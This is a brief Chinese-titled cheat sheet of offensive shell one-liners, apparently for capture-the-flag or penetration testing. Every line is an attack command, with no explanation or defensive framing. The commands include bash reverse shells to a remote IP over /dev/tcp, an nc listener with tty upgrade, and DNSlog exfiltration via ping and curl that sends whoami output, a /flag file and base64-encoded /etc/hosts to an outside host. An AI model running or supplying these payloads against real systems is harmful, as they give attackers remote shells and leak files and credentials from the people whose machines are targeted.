常用命令清单
bash -i >& /dev/tcp/8.8.8.8/4444 0>&1
# tty shell 服务器监听
stty raw -echo;nc -lvp 30001
# tty shell 目标机器反弹
bash -c 'bash -c "script -q /dev/null" -i >& /dev/tcp/8.8.8.8/30001 0>&1'
ping `whoami`.test.dnslog.link
curl http://test.dnslog.link/?r=`whoami`
curl http://test.dnslog.link/?r=`cat /flag|base64`
curl http://test.dnslog.link/?r=$(cat /etc/hosts|base64|tr '\n' '-')